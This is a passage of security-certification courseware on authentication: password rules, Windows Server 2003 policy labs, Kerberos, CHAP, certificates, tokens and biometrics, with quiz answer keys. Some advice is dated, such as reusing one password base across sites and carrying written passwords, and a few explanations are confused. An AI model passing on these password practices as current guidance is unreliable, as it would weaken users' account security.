function.
F Explain the biometric authentication
processes.
22
Topic A: Introduction to authentication

This topic covers the following CompTIA Security+ exam objectives:
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Username/Password 1.3 Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols
Authentication
Explanation Security of system resources generally follows a three-step process of authentication, authorization, and accounting (AAA). This AAA model begins with positive identification of the person or system seeking access to secured information or services (authentication). That person is granted a predetermined level of access to the resources (authorization), and the use of each asset is then logged (accounting). The most critical step in the process is authentication. Without a positive identification, other steps are worthless, because they cannot distinguish between the authorized user and an imposter. The amount of security implemented in the authentication process should be proportional to the value of the resources being protected. As our dependence on computer network systems has increased, so has our willingness to pay for stronger authentication technologies to secure against attack.
Usernames and passwords

Secret passwords have been used for millennia to gain access to otherwise forbidden places. They have been as simple as open sesame and as demanding as the exact words to a very long poem. In todays computing environment, they are the prevailing means of authentication. Usernames A username is a unique identifier that we use to identify ourselves to a computer or network system when we log on. It is usually constructed of easily remembered characters. The username and password together allow for a users authentication. The username should be treated as an equal part of the authentication key and held in similar confidence to the password. Not keeping your username secret can provide a potential hacker with half the information needed to masquerade as you obtain the use of all your system rights and privileges. Passwords A password is a secret combination of key strokes that, when combined with your username, authenticates you to the computer or network system. In terms of authentication, it is something that we know, rather than something we own or a part of who we are, such as key card or a fingerprint. We are required to use many different passwords, so we tend to prefer short, easy-to-remember passwords because longer passwords take too long to type, and more complex passwords are more difficult to remember.
Authentication
23
With increasing numbers of sites requiring authorization, users often choose to reuse the same simplistic password on multiple sites, aggravating the vulnerabilities of the authentication keys of which such passwords are a part. Password protection guidelines The proliferation of computing has led to the use of weak personal password techniques. These weak techniques are the crux of the problem with passwords. We are now operating in a digital environment in which the bad guys are using faster and more capable computers and applications to violate our computer systems, because of this, we need to more carefully construct, use, and store our passwords. There are many different password conventions, but, there are five basic rules to follow in order to safeguard your passwords: Passwords must be memorized. If they must be written down, the written records must be locked up. For multiple applications, each password you choose must be different from any other you use.
Some operating systems such as NetWare do not recognize the difference between upper and lower case letters.
Passwords must be at least six characters long, and preferably longer, depending on the size of the character set used. Passwords must contain a mixture of letters (both uppercase and lowercase) if the operating system supports case-sensitive passwords, numbers, and other characters, such as %, !, or &. Passwords must be changed periodically. Strong password creation techniques It is important to choose passwords that are easy to remember but difficult to recognize. One way to do this is to think of a simple phrase or words to a song that can be easily remembered, such as, April showers bring Might flowers. Use the first letters of each word and add a number and a punctuation mark or another character, which might give youAsb4Mf? Another technique is to combine two dissimilar words and place a number between them, such as SleigH9ShoE. One can also substitute numbers for letters, but this should be done carefully. Replacing the words to and for with their numeric synonyms, 2 and 4 is a fairly obvious ploy to most hackers. An all too frequent example of this simple substitution process is pa55w0rd. A five is just a reformatted S, and zero could easily be the letter O. Most password cracking utilities check for these types of well-known substitutions. The key is that your password means something to you and that it creates a strong password, one that cannot be easily guessed or quickly discovered using a brute force attack (the process of systematically trying every single possible combination of characters until the correct combination is determined). Techniques to use multiple passwords People often have access to many different systems, each requiring a username/password set. It is recommended that you use a different password every time one is required, but you can also group different Web sites or applications by their appropriate level of security and use a different password for each of those groups while taking care to actually use a different password for each of the more critical Web sites (for example., those of financial institutions) and applications (for example, financial software).
Have each student devise a strong password and write it down on a piece of paper along with their name. Collect the papers and after several more minutes of discussion, have each student recall their password. You be the judge as to whether the password qualifies as strong.
24
CompTIA Security+ Certification For example, one lower-level group might make up the various news and weatherrelated Web sites you visit. If someone were to obtain your password to these sites, it would do you no real harm. Another method is to cycle your more complex passwords down the groups, from most sensitive to least. This allows you to reduce the total number of passwords that you are using while giving you time to work with a given password (and remember it) before relegating it for use in the more insecure password entry fields that you might encounter. You might also try using a common password base, but change parts of the password depending on where you are required to use it. For example, you could take the password ToRn71@L (sort of like torrential) and depending on the Web site change the T, R, and L to NoYn71@T for the New York Times Web site and SoAn71@N for the SANS Institute Web site. Storing passwords If you must write a list of your various passwords down on paper, keep the piece of paper close to you in an item that you are not likely to lose sight of, such as a purse or wallet. These passwords should be written in very small type to minimize someone else reading the information. Another good practice is to develop a personal code to apply to your password list. For instance, the first three characters of each password might be transposed and moved to the end of the password string, and the hostname might be moved down one place in the list, lining it up with a password for a different server. The individual who owns this written password card would have no problem quickly decoding the information to enter, but it adds a small delay for anyone who would maliciously use the information. If you keep this list electronically, encrypt the password list with Windows 2000/Server 2003/XP encryption or some application that is specifically designed for this purpose. Password protect the encrypted file with a strong password (different from your login password) and never electronically store the password that gains access to the file.
The RunAs service

RunAs allows an administrator to log on with a standard user account and still run administrative programs with administrative rights. Those rights are only applied to the application, so viruses, worms, and Trojan Horses cannot access the network with administrative privileges. To activate RunAs, press Shift and then right-click an application, shortcut or service. Provide the appropriate administrator credentials and click OK. This way, you can, for example, check e-mail and perform necessary management tasks without actually being logged on as administrator. At the same time, having RunAs available makes it possible for regular users to access the network with administrative privileges should they know the logon credentials of an administrative user. To prevent users from using the RunAs service, you can disable it. Notice that you shouldn't use RunAs to run certain applications, such as word processing applications. Setting login policies in Windows Server 2003 Windows Server 2003 provides several safeguards to discourage hackers from attacking your network. These include the following: Removing the name of the last user to logon to the system. Without an account name, the hacker will have an extra step to complete before gaining access to the system.
Authentication
25
Specifying a minimum length for passwords. Short passwords or blank passwords are easy to crack. Setting the password complexity to require use of at least three of the following: one number, one uppercase letter, one lowercase letter, or one symbol. Combining password length with complexity is a recommended method of security professionals. Implementing an account lockout policy. The account lockout policy will disable an account for a specific amount of time after a certain number of failed logon attempts. To prevent display of the last logon name in Windows Server 2003, modify the local security policy and change the Interactive logon: Do not display last user name option to Enabled. Do it!
A-1:
Preventing the display of the last logon name Heres why
Heres how
1 Log on to the Windows Server 2003 server as Administrator 2 Click Start Choose Administrative
Tools, Local Security Policy
The Local Security Settings window appears.
3 Expand Local Policies
4 Select Security Options 5 Double-click Interactive

logon: Do not display last user name
6 Select Enabled Click OK 7 Close all windows and log off 8 Press c + a + d
Notice the User name field is empty in the logon screen.
26
Minimum password lengths

Explanation To specify a minimum length for passwords in Windows Server 2003, modify the local security policy and change the Minimum password length option.
Do it!
A-2:
Using the Windows Server 2003 local password policy settings for length Heres why
Heres how
To access the Local Security Settings window.
3 Expand Account Policies 4 Select Password Policy 5 Double-click Minimum

password length To start the process of changing the default password policy.
Change the characters value to 9 6 Click OK 7 Close all windows and log off 8 Log on as User1 9 Press c + a + d
Tell students this step is not meant to be successful.
The user does not yet require a password to log on.
10 Click Change Password In both the New Password and Confirm New Password text boxes, type a new password of less than 9 characters Click OK
A message stating your password must be at least 9 characters long cannot repeat any of your previous 0 passwords and must be at least 0 days old appears. To change the password.
11 Assign password1 as the new password 12 Click OK 13 Log off
Authentication
27
Password complexity
Explanation Finally, to set the password complexity in Windows Server 2003, modify the local security policy and change the Passwords must meet complexity requirements option.
Do it!
A-3:
Using the Windows Server 2003 local password policy settings for complexity Heres why
Heres how
To access the Local Security Settings window.
3 Expand Account Policies 4 Select Password Policy 5 Double-click Password must meet complexity requirements Select Enabled 6 Click OK 7 Close all windows and log off 8 Log on as User1 9 Press c + a + d 10 Click Change Password
(If necessary.) (If necessary.)
In the Old Password box, type password1 In the New Password box and Confirm New Password box, type password321
Review the entire message with your students.
11 Click OK 12 Assign Password1 as the new password
A message box appears, indicating restrictions and steps for completing the password change. The password change is successful. Changing the p in password to a capital P caused the password to meet the password complexity requirements.
13 Log off User1
28
Topic B: Kerberos
This topic covers the following CompTIA Security+ exam objective:
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Kerberos Mutual
Introducing Kerberos
Explanation In 1983, researchers at the Massachusetts Institute of Technology (MIT) started a fiveyear project to incorporate computers into the MIT curriculum. As part of the project, a leading edge network authentication protocol was developed. It was named Kerberos, after the three-headed dog that guarded the entrance to Hades in Greek mythology. In 1989, version 4 was publicly released in open source code. Although Kerberos 4 is still in use in a few environments, Kerberos 5 is the standard today. As of this writing, the latest version is Kerberos 5-1.4.2. Kerberos is freely available to anyone in the U.S. and Canada from the following Web page:
itinfo.mit.edu/product.php?name=Kerberos
Point out that Kerberos 5 is the current standard today. Point to the Web site where Kerberos security is freely available.
Kerberos provides a means to authenticate users and services over an open multiplatform network using a single login procedure. After the user is authenticated by the system, all subsequent commands and transactions can be carried out securely without any prompting for a password.
Authentication
29
Terminology
The Kerberos system consists of the following components: Principal Any uniquely-named client or server to which Kerberos can assign tickets. Authentication Server (AS) A network service that authenticates users or services, then supplies ticket-granting tickets to the authorized user or service. Ticket-Granting Server (TGS) A network service that supplies temporary session keys and tickets to authorized users or services. Key Distribution Center (KDC) A server running both AS and TGS services: services both initial ticket and ticket-granting ticket requests. Realm An organizational boundary that is formed to provide authentication boundaries. Each realm has an Authentication Server and a Ticket-Granting Server. Remote Ticket-Granting Server (RTGS) A remote realms TGS. The following terms describe types of data that are passed over the network during Kerberos processing: Credentials A ticket for the resource server plus a temporary encryption key (session key). Session key A temporary encryption key used between the client and resource server, with a lifetime limited to the duration of a single login session. Authenticator A record containing information that can be shown to have been recently generated using the session key known only by the client and server. The authenticator is typically valid for five minutes and cannot be reused. Ticket A record that helps a client authenticate itself to a server; it contains the clients identity, a session key, a timestamp, and checksum, all sealed using the resource servers secret key. Ticket-Granting Ticket (TGT) A ticket that is granted as part of the Kerberos authentication process and used to obtain other tickets from the TGS.
210
How it works
Kerberos uses encryption technologies to pass a users credentials over unsecured channels and validate the user for network resources. The process, pictured in Exhibit 21, is as follows: 1 When Maria logs on to her workstation with her username and password, the workstation automatically sends a request to the Authenticating Server (AS) for a Ticket-Granting Ticket (TGT). The AS has a database listing the valid users and servers within the scope of its authority (realm) and their master keys. 2 The AS receives the request for a TGT, authenticates Maria, uses her master key to encrypt a new TGT, and sends it back to Marias workstation. Now that she has a TGT, she does not have to keep authenticating herself to gain access to additional services, at least until the TGT expires. (The TGT is valid for the duration of the logon session, as configured in the account security policy, or until the user disconnects or logs off.) 3 Whenever Maria needs a new service, her workstation sends a copy of the TGT, along with the name of the server that holds the application she needs, an authenticator, and the time period that she needs access to each service, to the ticketgranting server (TGS) requesting a ticket for each of the services she needs. 4 Once the TGS has verified that Maria is in fact who she says she is, using the session key to access her authenticator, and assuming the TGT matches her to her authenticator, the TGS sends her tickets to use the services she needs. 5 After receiving the appropriate tickets from the TGS, Marias workstation verifies that each one is for a service that she originally requested, and sends a ticket to each relevant server requesting permission to use their services. 6 Each of the servers that receive a request for service verifies that the request came from the same person, or machine, to which the TGS granted the ticket. As each server determines that Maria has the authority to use the service requested it authorizes her to begin using those services. The TGT must be submitted each time Maria needs additional services. Each time the validity period for using previously requested service expires, an entirely new TGT must be obtained.
Authenticating Server 1 2
3 4
Client 5 6
Ticket-Granting Server
Resource Server
Exhibit 2-1: Kerberos authentication process
Authentication
211
Using Kerberos in very large network systems

Previously, we discussed the process by which Kerberos uses an AS, TGT, and a TGS to streamline the authentication process. This is useful in environments that have many users and services on the network; however, in the case of very large organizations, the computer network can encompass many different organizational boundaries, whether they are geographical or functional, and serve thousands of users. In such a system, it would not make sense for each user to go through a single AS and TGS. In very large organizations, Kerberos employs multiple authentication servers, each of which is responsible for a subset of users and servers in the network system. Each of these subsets has its own AS and TGS and is called a realm. Cross-realm authentication must occur in order for a client to use a service that is running in a realm other than its own. Kerberos uses a hierarchical organization to accomplish this, much as a network administrator uses hierarchical IP addresses to identify subnetworks within a large system. The process for cross-realm authentication is as follows: 1 The client contacts its local TGS, requesting permission to access a service in a remote realm. 2 The TGS returns a remote TGT. The token does not provide access to any specific remote TGS or service; it simply informs other TGSs that the user has been authenticated. 3 The client presents the remote TGT to the remote TGS requesting access to a service within its realm. 4 The RTGS checks the users credentials and establishes a session key. It returns the session key to the client. 5 The client submits the session key to the RTGS to use its services. 6 The remote resource server checks the users credentials and allows access to the service.
Authenticating Server 1 2
3 4
Client 5 6
RTGS
Cross-Realm Server
Exhibit 2-2: Cross-realm authentication For more information about Kerberos, including initial, preauthentication, invalid, renewable, postdated, proxiable, and forwardable tickets, see RFC 1510. RFCs can be found at the following Web page:
http://www.faqs.org/rfcs/rfc-index.html
212
Security weaknesses of Kerberos

Kerberos does a good job of authenticating an individual users right to access a network resource, however, Kerberos does have the following vulnerabilities: Password-guessing attacks are not solved by Kerberos. An attacker can use a dictionary attack to decrypt a key if a user chooses a weak password. Kerberos assumes that workstations, servers, and other devices that are connected to the network are physically secure, and that there is no way for an attacker to gain access to a password by establishing a position between the user and the service being sought. You must keep your password secret. If you share your password with untrustworthy individuals, or send the password in plain text e-mail, or write your password on the bottom of your keyboard, then an attacker can easily gain access to services that are supposed to be available only to you. Denial-of-service attacks are not prevented by Kerberos. The internal clocks of authenticating devices on a network must be loosely synchronized in order for authentication to properly take place. The authentication server (AS), and any other server that maintains a cache of master keys, must be secure. If an attacker gains access to the AS then he or she can impersonate any authorized user on the network. Authenticating device identifiers must not be recycled on a short-term basis. For example, a particular user is no longer a part of the network, but is not removed from the access control list (a manually configured list that limits access to network resources to authorized users only). If that users principal identifier is given to another user, then the new user has access to the same network services as the original user.
Mutual authentication
Mutual authentication is the process by which each party in an electronic communication verifies the identity of the other. For instance, a bank clearly has an interest in positively identifying an account holder prior to allowing a transfer of funds; however, you as a bank customer also have a financial interest in knowing your communication is with the banks server prior to providing your personal information. Kerberos allows a service to authenticate a recipient so that access to the service is protected. Conversely, it allows the recipient to authenticate the service provider so rogue services are blocked.
Authentication Do it!
213
B-1:
Discussing Kerberos

1 What are some vulnerabilities in Kerberos security?
Unsecured or weak passwords Physically accessible workstations and servers Vulnerable to denial-of-service attacks Recycled SIDs
2 A subset of users in a very large system employing Kerberos is called a: A B C

D
Peer Client Server Realm
3 In very large organizations, Kerberos employs multiple authentication servers, each of which is responsible for a subset of users and servers in the network system. True or false?
True
4 Which of the following is/are not true in a Kerberized system? A B

C
Once the user has been authenticated, the AS sends the user a ticket-granting ticket (TGT). Once the client has received a TGT, the client presents it to the TGS in order to receive a session key for each requested service. Once the client receives the appropriate ticket from the TGS, the client submits a request to the authentication server.
5 How long is a timestamp valid in a Kerberos authenticator? A B C

D
Eight hours One hour Twenty minutes Five minutes Two minutes
214
Topic C: Challenge Handshake Authentication Protocol

# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication CHAP
Introducing CHAP
Explanation The Challenge Handshake Authentication Protocol (CHAP) is an authentication scheme used by Point-to-Point Protocol (PPP) servers to validate the identity of the remote client at the beginning of the communication session or any time throughout the session.
The CHAP challenge-and-response sequence

After a link is established between the peer and authenticating server, CHAP applies a three-way handshake procedure as follows: 1 The authenticating server sends a challenge message to the peer. 2 The peer responds with a value that has been calculated using a one-way hash function (an algorithmic function that takes an input message of arbitrary length and returns an output of fixed length). 3 The authenticating server receives the response and checks it against its own calculation of the expected hash value. The authenticating server must respond to the peer with either a success or a failure message. The connection is terminated if the values do not match. 4 The authenticator sends a new challenge to the peer at random intervals throughout the session to make sure it is still communicating with the same peer.
1. Challenge message 2. Response hash 3. Success or failure
Authenticating Server
Peer
Exhibit 2-3: CHAP challenge-and-response process
Authentication
215
CHAP protects against playback attacks by changing the content of the challenge message with each authentication request. The challenge can be repeated at unpredictable intervals while the connection is open, limiting the time of exposure to any single attack, and the server is in control of the frequency and timing of the challenges. For further information on CHAP, see the following Web page:
http://www.ietf.org/rfc/rfc1994.txt
Do it!
C-1:
Reviewing the Kerberos handshake

1 Put the following steps in the proper sequence. ___ The authenticator sends a new challenge to the peer at random intervals throughout the session to make sure that it is still communicating with the same peer. ___ The peer responds with a hash value. ___ The authenticating server sends a challenge message to the peer. ___ The authenticating server checks the response against its own calculation of the expected hash value. ___ The authenticating server responds with either a success or a failure message.
5
2 1 3
2 CHAP protects against ___________ attacks by changing the content of the challenge message with each authentication request.
playback
216
Topic D: Digital certificates

# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Certificates 4.1 Be able to identify and explain the of the following different kinds of cryptographic algorithms Symmetric Asymmetric 4.3 Understand and be able to explain the following concepts of PKI (Public Key Infrastructure) Certificates
Introducing digital certificates

Explanation Digital certificates are used to authenticate a persons or an organizations identity on the Internet. They are used in a variety of transactions including e-mail, electronic commerce, and the electronic transfer of funds. Digital certificates provide individuals and organizations with a means of privately sharing information so each party is confident that the individual or organization with which they are communicating is in fact who it claims to be. In order to be sure this is true, its necessary to involve a third, trusted party to legitimize, or pre-qualify, individuals and organizations.
Electronic encryption and decryption concepts

Before digital certificates are discussed in detail, its important to understand some basic concepts about cryptography. In simple terms, encryption is the process of converting a plain text message into a secret message; decryption reverses the process and converts a secret message into a plain text message. There are two basic types of ciphers (techniques that are used for encryption and decryption), symmetric ciphers and asymmetric ciphers: Symmetric ciphers use the same key to both encrypt and decrypt a message. Although symmetric encryption algorithms are computationally more efficient, there is a risk that an unintended party could stage an attack if they intercepted the key as it was passed between the sender and the receiver. Asymmetric ciphersrequire one key to be used to encrypt the message and a different key to be used to decrypt it. The keys are different, but they act as a pair. When you create the key pair, one of the keys is designated as the private key, which is sometimes referred to as a secret key, and the other is designated as the public key. As asymmetric ciphers require two different keys, they are typically more secure, if more complex, than symmetric ciphers. Private keys can be held by individuals or groups of individuals that are part of a predefined group.
Authentication
217
Public key system

A message encrypted by one key in a key pair might be decrypted using the other. This is part of what is called a public key system. You keep your private key private and you share your public key with anyone you wish. This way the private key or the algorithm upon which it is based is not compromised. This means that anyone can use the public key to send an encrypted message, but only the private key holder(s) can decrypt it. The following example of an encrypted communication between Alice and Bob illustrates this concept. Alice and Bob have never before communicated with each other. When Alice and Bob want to communicate with each other, they can share their plaintext public keys with each other over an insecure line. If Alice uses Bobs public key to encrypt a message to him, only Bob can decrypt it using his private key, and vice versa. If, however, both Bob and Alice have published their public keys online, how does Bob know its actually Alice who sent him the message, and not some other person who accessed his public key claiming to be Alice? Alices identity can be verified if she notarizes the message with a digital certificate issued by a certification authority. A certification authority (CA) is a third-party entity that verifies the actual identity of an organization or individual before it provides the organization or individual with a digital certificate, much the same way that a state provides a business with a business license, or a national government provides a citizen with a passport. A certificate is only issued after careful verification of an individuals or organizations identity using the appropriate documentation. The digital certificate typically consists of the owners public key and name, the expiration date of the public key (which is usually only valid for one year), the name of the CA that issued the digital certificate, the serial number of the digital certificate, and the digital signature of the CA.
How much trust should one place in a CA?

Referring back to our previous example, now that Bob has received a message from Alice (signed with a digital certificate and authenticated by a certificate authority), does this mean Bob can now trust that the sender was actually Alice and not an imposter? It all depends on how much he trusts the CA. It is possible that the CA did not do its homework and did not receive enough information from the person who applied for a digital certificate using Alices name to guarantee that person actually was Alice. Serving digital certificates is no longer a complex or expensive process. In fact, Windows Server 2003 comes with a certificate server.
Assure students certificates will be revisited several times in different contexts during the course, so they will have many opportunities to understand this concept.
Popular and usually more reputable CAs, such as VeriSign, have several levels of authentication that they issue, based on the amount of data they collect from their applicants. An applicant must usually show up in person to show the companies the required documentation to be granted the highest level. Less proof is required to receive lower levels of authentication. This means that if a CA wants to succeed in the marketplace they must be very careful when granting higher levels of authentication. It also means that people need to check the digital certificates they receive from other people and organizations to make sure that a reputable CA issued them. Digital certificates are proving themselves very useful on the Internet because they provide a safe and secure means of digital authentication.
218
Do it!
D-1:
Discussing digital certificates

1 Asymmetric ciphers require a public key to encrypt a message and a ______________ to decrypt it.
private key
2 A trusted, third-party entity that verifies the actual identity of an organization or individual before it provides a digital certificate is called a: A B
C
Cross-realm authentication Digital signature Certification authority
3 Symmetric ciphers use the same key to both encrypt and decrypt a message. True or false?
True
4 Digital certificate consists of which of the following? (Choose all that apply.)
A
The certificate owners public key The certificate owners signature The certification authoritys signature The expiration date of the public key
B
C D
5 What is the purpose of the digital certificate?

To authenticate a persons or organizations identity on the Internet
Authentication
219
Topic E: Security tokens

# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Tokens
Introducing security tokens

Explanation A security token is an authentication device that has been assigned to a specific user by an appropriate administrator. Security tokens come under the something you have category of authentication. Usually security tokens are small, credit card-sized physical devices you can carry around, although there are some software-based security tokens that can reside on your workstation. Most security tokens also incorporate two-factor authentication methods to work effectively. That means you must possess both the correct password (something you know) and the correct token (something you have) to gain access to the resources you are seeking. There are two types of security tokens: passive and active. Although both possess a base key, the passive token simply acts as a storage device for the base key, and the active token can provide variable outputs in various circumstances. One of the best qualities of either a passive or active token is that they can utilize base keys that are much stronger than the relatively short and simple passwords that a person can remember. Tokens provide you and the system in which you are operating with very strong authentication tools. The downside to tokens of course, like your car keys, is that if you lose them, you cannot get into your computer system.
Introduce the concept of something you have versus something you know as it applies to authentication. A security token is like having an ATM card that allows you to begin transactions at automatic teller machines. You must also know the PIN in order to complete the transaction.
Passive tokens
Passive tokens simply act as storage devices for base keys. They share their keys by various means: notches on the token match a receiving device, magnetic strips transmit the key by using a card reader; optical bar codes are read by a scanner, and so on. The most common passive tokens are plastic cards with magnetic strips embedded in them. ATM cards, credit cards, card keys that open electronic door locks, and other types of these keys are everywhere today. They are cheap to manufacture and read, and are easy to carry, but unfortunately, they are also more easily copied than other types of tokens. This is why many of these types of tokens require that a PIN be produced along with the card. These PINs, like passwords typed into a computer, can be easily gained by someone glancing over your shoulder.
Active tokens
Unlike a passive token, an active token does not emit or otherwise share its base token. Instead, it actively creates another form of the base keysuch as a one-time password or an encrypted form of the base keythat is not subject to attack each time the owner tries to authenticate.
220
CompTIA Security+ Certification Originally these types of tokens required the user to read a value and type it into the computer using their keyboard. Increasingly common are tokens that plug directly into the computer. Some examples of this are smart cards, PCMCIA cards, USB tokens, and others that require a proprietary reader. In particular, smart cards offer many advantages and are gaining in popularity. A smart card is a plastic card, about the same size as a credit card, which has an embedded chip with an integrated circuit that provides either memory or memory along with a programmable microprocessor. Smart cards come in different formscontact, contactless, or hybridwhich can either be plugged into a device, or not, to work. Depending on the amount of memory and the type of microprocessor they have, smart cards can perform a multitude of functions. They can act as an employee badge, a credit card, an electronic building key, or some other access-granting certificate. They can also securely store personal information, such as biometric information, multiple username/password combinations, and individual health records, digital certificates, and private/public key infrastructure (PKI) keys.
One-time passwords
A one-time password is a password that is used only once for a very limited period of time and then is no longer valid. If it is intercepted at any point though, it becomes useless almost immediately. One-time passwords are typically generated using one of two strategies: by employing counter-based or clock-based tokens. A counter-based token is an active token that produces one-time passwords by combining the secret password with a counter that is synchronized with a counter in a server. Normally, you obtain the fresh password by pressing a button on the front of the token. A clock-based token is an active token that produces one-time passwords by combining a secret password with an internal clock. Both of these methods employ means to resynchronize the tokens counter or clock if they vary too much from the corresponding servers counter or clock. Although one-time password technologies significantly reduce the risk of attacks relative to static password technologiesthey are still open to certain kinds of attack, such as phone line redirection attacks (which divert an authenticated connection to capture transmitted data), IP address theft, and man-in-the-middle attacks.
221
E-1:
Discussing tokens

1 An active token does not emit or otherwise share its base token. True or false?
True
2 A passive token holds a microchip in order to perform a function or calculation on the base key information. True or false?
False: This describes an active token.
3 Explain the difference between counter-based and clock-based tokens.

Counter-based tokens produce one-time passwords by combining the secret password with a counter that is synchronized with a counter in a server; clock-based tokens produce onetime passwords by combining a secret password with an internal clock that is synchronized with the servers clock.
222
Topic F: Biometrics
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Multi-factor Biometrics 5.1 Understand the application of the following concepts of physical security Access Control Biometrics
Introducing biometric authentication

Explanation Biometric authentication is based upon an individuals unique physical or behavioral characteristics. Physical characteristics that are commonly measured include fingerprints, hand geometry, retinal and iris patterns, and facial characteristics. Behavioral characteristics that are commonly measured include handwritten signatures and voice. Biometrics is the most secure form of authentication because it relies on measuring who an individual is, rather than what they know or what they have. Furthermore, biometric authentication is the most convenient type of authentication because the person need not remember anything or carry anything with them. This section examines how a biometric authentication system works, how each of the physical and behavioral characteristics is measured, the strengths and weaknesses associated with those measurements, and the general trends and issues associated with biometric authentication as a whole.
Working of a biometric authentication system

The process by which a biometric authentication system works is outlined in the following steps. The first four steps of this process are used to collect initial biometric measurements of an individual. Steps five through eight in the following list correspond to the authentication process that takes place when that individual needs to be authenticated to access a restricted area, whether that area is a room in a building or a computer/network resource. 1 Your identity is verified using acceptable forms of identification, such as a drivers license, passport, or company identity badge. 2 Your chosen biometric (fingerprint, iris features, handwritten signature, and so on) needs to be scanned for the first time. 3 The biometric information must then be analyzed by a computer and put into an electronic template. 4 The template is then stored in some kind of repository (a local repository, a central repository, or a portable token such as a smart card). 5 When you wish to gain access to restricted areas of a building or computer system, your chosen biometric must be scanned again.
Authentication
223
6 A computer then analyzes the biometric data and compares it to the data stored in the preexisting template. 7 If the data provided by the current biometric scan sufficiently matches the data stored in the preexisting template, then the person is allowed access to the restricted area. 8 Following the authenticate, authorize, and audit (AAA) model introduced at the beginning of this unit, a record of the authentication should be kept so that an access audit can be performed later.
False positives and false negatives

Although biometric authentication is generally considered the most accurate of all authentication methods, it is not perfect. Unauthorized people are sometimes authenticated when they should not be and authorized people might be rejected even though they are actually who they claim to be. As mentioned previously, during the biometric authentication process, a persons current biometric data is compared to a preexisting template of the original biometric data. System administrators have the ability to set the degree to which the two should match in order for a person to be authenticated by the system. System administrators generally require higher degrees of similarity between the current and preexisting biometric data in highly secure environments and lower degrees of similarity in environments that are deemed less sensitive. False positive results When an unauthorized person is wrongly authenticated by biometric means, it is referred to as a false positive result. The likelihood of this happening is increased when the biometric data-matching standards are set too low. This can occur when the administrator does not place the need for security above users general frustration at having to repeatedly have their biometric data scanned when wanting to gain access to a restricted area. A false positive result can also occur when there is a desire to move many people through the scanning process in a short period of time, such as when biometric authentication of fingerprints are used to allow many employees to enter the building at the beginning of each work period. False negative results When an authorized person is not authenticated by biometric means and they are actually who they claim to be and they have the authority to gain access to a restricted area, it is referred to as a false negative result. This can occur when the biometric being measured has changed for some reason since the initial scan was taken. For example, if a man has grown or shaved off a beard, his current biometric data can differ greatly from that which was gathered during the initial scan. False negatives can result in lost productivity when employees cannot gain access to the resources they need to perform their job duties. They can take up valuable time of network administrators to rectify the problem, and finally, they cause a great deal of frustration for the person who is authorized, but unable, to access certain crucial areas.
224
Different kinds of biometrics

The following sections on physical and behavioral characteristics highlight what is being measured during the various types of biometric authentication procedures and the basic strengths and weaknesses of each. Physical characteristics Physical characteristics are those that are actually part of a person, such as the patterns found on their fingerprint or iris, or the size of the various parts of their hand. Fingerprints A fingerprint scanner looks at the patterns found on the surface of a fingertip. It is the oldest and most widely deployed biometric technology. Because of this, prices of these devices (shown in Exhibit 2-4) are relatively low.
Exhibit 2-4: Fingerprint scanner by DigitalPersona A fingerprint scanner can be deployed in a broad range of environments; it provides flexibility and increased system accuracy by allowing users to enroll multiple fingers in the template system. Its weaknesses include the fact that it might not work properly if the fingertip or the device sensor is dirty, and that it is associated with criminality. Hand geometry Hand geometry authentication involves the measurement and analysis of different hand measurements. This biometric is relatively easy to use; moreover, simple integration into other systems and processes combined with an ability to scan people quickly and easily, makes this a popular choice for many companies. Relative to other biometrics, it has limited accuracy due to the relatively common measurements of peoples hands. Furthermore, a hand-scanning device (shown in Exhibit 2-5) is rather large and is unsuitable for cramped locations.
Authentication
225
Exhibit 2-5: Hand geometry scanner: HandkeyII by Recognition Systems Inc. Retinal scanning Retinal scanning involves analyzing the layer of blood vessels located at the back of the eye. This method is highly accurate, is very difficult to spoof, and measures a stable physiological trait. Its difficult to use because it requires the user to focus on a specific point in a receptacle (shown in Exhibit 2-6), and like a hand scanner, it is a relatively large device that would not work well in many situations. This is very expensive technology and might be appropriate only in very high-security areas.
Exhibit 2-6: Retinal scanner by Eyedentify Inc.
226
CompTIA Security+ Certification Iris scanning Iris scanning involves analyzing the patterns of the colored part of the eye surrounding the pupil. It uses a relatively normal camera (shown in Exhibit 2-7) and does not require close contact between the eye and the scanner. Glasses can be worn during an iris scan, unlike a retinal scan. Template matching rates for this technology are very high; however, ease of use is still not very high compared to other methods.
Exhibit 2-7: Iris scanner by Panasonic Authenticam Facial scanning Facial scanning biometrics involves analyzing facial characteristics. It is a unique biometric in that it does not require the cooperation of the scanned individual: it can utilize almost any high-resolution image acquisition device such as a still or motion camera. Although this discussion is primarily concerned with the use of facial scanning to authenticate people trying to gain access to electronic resources, some government agencies are increasingly interested in using publicly placed cameras and driver license photos to help identify and track criminals and terrorists. Weaknesses in this system include the fact that scanning capabilities can be reduced in low light, facial features can change over time, and there are some concerns about the use of this technology on unsuspecting people who do not know they are being scanned. Behavioral characteristics Behavioral characteristics are those that are exhibited by an individual, such as the way a person signs her name or speaks a predetermined phrase, rather than characteristics that are actually a part of the physical makeup of that person, such as a fingerprint or the patterns of the iris or retina. Handwritten signature verification analyzes the way people sign their name, such as speed and pressure, as well as the final static shape of the signature itself. Signature scanning (Exhibit 2-8) is relatively accurate and, of course, people are already familiar with it as a form of authentication, which means they might not feel as invaded using this technology as they might with a fingerprint scan. A major weakness in this method is not with the technology, but with the user. Most people do not sign their name in a consistent manner, which can cause a high error rate when using this system to authenticate. Ironically, the presence of a physical signature is often the rationale for not adding more robust authentication methods.
Authentication
227
Exhibit 2-8: Signature scanner by Interlink ePad VP9105 Voice authentication relies on voice-to-print technologies, not voice recognition. In this process, your voice is transformed into text and compared to an original template. Although this is fairly easy technology to implement because many computers already have built-in microphones, the enrollment procedure is more complicated than other biometrics, and background noise can interfere with the scanning, which can be frustrating to the user.
General trends in biometrics

